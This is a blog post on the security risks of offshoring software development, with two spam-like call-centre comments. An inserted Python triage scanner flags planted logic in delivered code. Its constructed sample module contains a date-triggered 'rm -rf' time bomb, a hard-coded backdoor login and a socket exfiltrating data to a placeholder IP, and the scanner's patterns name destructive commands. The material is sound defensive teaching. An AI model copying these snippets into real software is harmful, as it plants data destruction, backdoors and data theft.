Risks of Offshoring

I have been looking at a number of security issues related to offshore development as of late.  Basically they tend to fall into a few broad categories:

  1. Intellectual property drain – I have heard it said: “If you want to keep a secret – don’t tell nobody.”  Well, sending the specifications for business-critical software overseas to be implemented in a foreign country, one with a radically different legal system and cultural appreciation for intellectual property, probably qualifies as “telling somebody.”  This was less of an issue when the work going overseas was Y2K COBOL maintenance, but these days genuinely innovative software is being implemented all around the world, and the risk is far greater.  Google can give you some recommendations on best practices for offshore development, but at the end of the day moving development offshore drastically increases the risk that the confidentiality of your information will be compromised.
  2. Malicious code – This is the threat that offshore developers intentionally insert malicious code into the software that is delivered.  Malicious code could be anything from time bombs set to go off if future contract negotiations do not go well, to code that siphons off customer data, to system-level backdoors.  Slashdot had an article today about the US government investigating Lenovo.  This wasn’t specifically about offshore software, but it does speak to concerns about having information technology goods produced offshore.  The “good” news here is that at least organizations have a chance to review the code before it goes into production (hopefully).  The “bad” news is that reviewing code to find these sorts of defects is extremely time-consuming and requires well-trained individuals.  In cases like this it isn’t a matter of finding technical flaws such as SQL injection or Cross-Site Scripting problems that automated code scanners can find; planted logic is written to look like ordinary application behavior, so it requires a line-by-line search for logical flaws in the application that result in a compromise.  The review also has to cover everything that actually ships, including build scripts and any bundled third-party libraries, not just the application source.  Malicious code in offshore-developed software is especially scary because it brings into question the confidentiality, integrity and availability of any systems brought online based on the code.
  3. Insecure code – If US developers can make mistakes, so can offshore developers.  US-based software development organizations are bad enough at designing and implementing reasonably secure applications.  If offshore organizations are soliciting customers primarily on price, security will be the first concern to go out the window.  In my experience, I have seen this become an issue time and time again when organizations with little in-house technical expertise try to develop software offshore.  They simply don’t know what to ask for.  Even organizations that are technically sophisticated often do not make this a priority.  If you ask for security you might not get it; if you don’t ask for security you certainly won’t get it.
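To make the second category concrete, here is an added example (my own, not Denim Group code and not a tool mentioned in the original post) of the kind of triage pass a reviewer might run over a delivered code base before settling in for the line-by-line read. It looks for three shapes that a SQL injection or XSS scanner would never report: a calendar comparison that guards a destructive call (a time bomb), a credential-looking name compared against a string literal in an authentication path (a hard-coded backdoor), and a quoted IP address or URL (a fixed destination for siphoned data). The "delivered" module it scans is constructed for the example, and the rule names, regexes and the three-line window are all my assumptions; hits are pointers for a human reviewer, not proof of malice.

```python
"""Triage helper for reviewing third-party (e.g. offshore) deliverables.

Added example, not Denim Group code. The patterns below are the kind of
thing a SQL-injection or XSS scanner ignores but a reviewer hunting for
planted logic would start with. Hits are pointers for line-by-line human
review, not proof of malice; the sample module is constructed.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    line: int   # 1-based line number in the scanned source
    rule: str   # which heuristic fired
    text: str   # the offending line, stripped


# A calendar/time value compared against a literal year.
DATE_GUARD = re.compile(
    r"\b(date|datetime|time|now|today)\b.*(>=|<=|==|!=|>|<).*\b(19|20)\d\d\b")
# Calls that wipe data or kill the process; a date guard followed by one of
# these within a few lines is the classic "time bomb" shape.
DESTRUCTIVE = re.compile(
    r"rm -rf|rmtree|os\.remove|DROP TABLE|TRUNCATE|sys\.exit|os\._exit")
# A credential-looking name compared against a string literal: a hard-coded
# login that bypasses the real password check.
CRED_LITERAL = re.compile(
    r"\b(password|passwd|pwd|secret|token)\b\s*==\s*['\"][^'\"]+['\"]")
# A quoted IP address or URL: a fixed destination for exfiltrated data.
ENDPOINT_LITERAL = re.compile(
    r"['\"](\d{1,3}(?:\.\d{1,3}){3}|https?://[^'\"]+)['\"]")


def scan(source: str, window: int = 3) -> List[Finding]:
    """Return suspicious lines in `source`, in file order."""
    lines = source.splitlines()
    findings: List[Finding] = []
    for lineno, raw in enumerate(lines, start=1):
        text = raw.strip()
        if text.startswith("#"):
            continue  # comment; a real tool would use the language's parser
        if CRED_LITERAL.search(text):
            findings.append(Finding(lineno, "hardcoded_credential", text))
        if ENDPOINT_LITERAL.search(text):
            findings.append(Finding(lineno, "hardcoded_endpoint", text))
        if DATE_GUARD.search(text):
            # Calendar comparisons are common in honest code; it becomes a
            # time-bomb candidate only when destruction follows close behind.
            following = lines[lineno:lineno + window]
            rule = ("time_bomb_candidate"
                    if any(DESTRUCTIVE.search(f) for f in following)
                    else "date_guard")
            findings.append(Finding(lineno, rule, text))
    return findings


# Constructed "deliverable" with one instance of each pattern (hypothetical).
SAMPLE_DELIVERABLE = """\
import datetime, os, socket

def nightly_cleanup(db):
    # housekeeping job; note the calendar guard on the purge
    if datetime.date.today() > datetime.date(2007, 12, 31):
        os.system("rm -rf /var/lib/app/data")
    db.vacuum()

def authenticate(user, password, db):
    if user == "svc_maint" and password == "x7Q!maint":
        return True
    return db.check_password(user, password)

def export_report(rows):
    s = socket.create_connection(("203.0.113.10", 4444))
    for r in rows:
        s.sendall(str(r).encode())
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_DELIVERABLE):
        print(f"line {f.line:>3}  {f.rule:<22} {f.text}")
```

Run as-is it reports lines 5, 10 and 15 of the sample module, and nothing for the comment on line 4. None of the three findings is a "vulnerability" in the scanner sense: each is syntactically ordinary code that only a human reading for intent can classify, which is exactly why this pass narrows the search but does not replace it.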

Offshoring software development can significantly reduce the costs of developing applications.  However, organizations need to take into account the costs of certifying the deliverables that come back as well as the indirect costs from the security risks associated with offshore development.

–Dan
dan _at_ denimgroup.com

About Dan Cornell

A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.

2 Responses to “Risks of Offshoring”

  1. Call Centers in the Philippines

    An insightful and articulate post! Offshore outsourcing services may continue to be associated with conventional concepts such as cost-savings, but if we analyze properly, we can easily see that the applicability of such concepts has witnessed constant erosion over the past few years. One of the main reasons for that has been the growing awareness that outsourcing services are not just a means to reduce operational costs, and that they play a more important role, i.e. acting as a vital link between businesses and their present and potential customers. This becomes evident when we look at recent customer survey results that clearly indicate that around 70% of customers move over to a new product or service if they are dissatisfied with the customer support services offered by their existing product manufacturer or service provider. -Jaime-

  2. Call Center Philippines

    Thank you for your thoughts; you bring up an interesting point. Companies are outsourcing software development to cheap labor overseas, where there is little or no way to ascertain the security risks posed by offshore workers. One risk is the potential loss of intellectual property and business-process secrets. Offshore outsourcers can copy and sell that knowledge or repackage it and present it to a competitor. Offshoring has the potential to redefine the CIO role from head of IT operations to executive in charge of global delivery of business services. What an auspicious opportunity for cautious CIOs who have the right stuff!
